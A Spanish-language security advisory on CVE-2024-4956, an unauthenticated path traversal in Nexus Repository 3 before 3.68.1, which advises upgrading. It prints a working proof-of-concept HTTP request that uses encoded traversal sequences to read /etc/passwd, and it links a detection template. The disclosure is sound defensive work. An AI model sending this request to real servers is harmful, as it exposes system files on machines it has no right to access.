
Path Traversal no autenticado en Nexus Repository 3
Nexus Repository Manager es un gestor de repositorios que organiza, almacena y distribuye artefactos necesarios para el desarrollo.
Se ha descubierto una vulnerabilidad de path traversal en Nexus Repository 3, en versiones anteriores a la 3.68.1. Esta vulnerabilidad permite a un atacante crear una URL para descargar archivos del sistema fuera del ámbito de la aplicación Nexus Repository, sin necesidad de autenticación. Esto supone un riesgo significativo, ya que puede exponer archivos sensibles del sistema y potencialmente comprometer la seguridad del entorno donde está instalado Nexus Repository.
Se recomienda actualizar Nexus Repository a la versión 3.68.1 o posterior lo antes posible para mitigar esta vulnerabilidad.
Para obtener más información y detalles técnicos sobre la vulnerabilidad, consulte el siguiente enlace:
Referencias:
La vulnerabilidad afecta a las versiones 3.0 a 3.68.0 de Sonatype Nexus Repository Manager.
Actualizar Nexus Repository es el enfoque recomendado para eliminar esta vulnerabilidad. Sin embargo, hay opciones de mitigación inmediata disponibles para implementaciones que no pueden actualizarse de inmediato:
Referencias:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Con el PoC anterior, es posible ver cómo se accede al archivo /etc/passwd:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml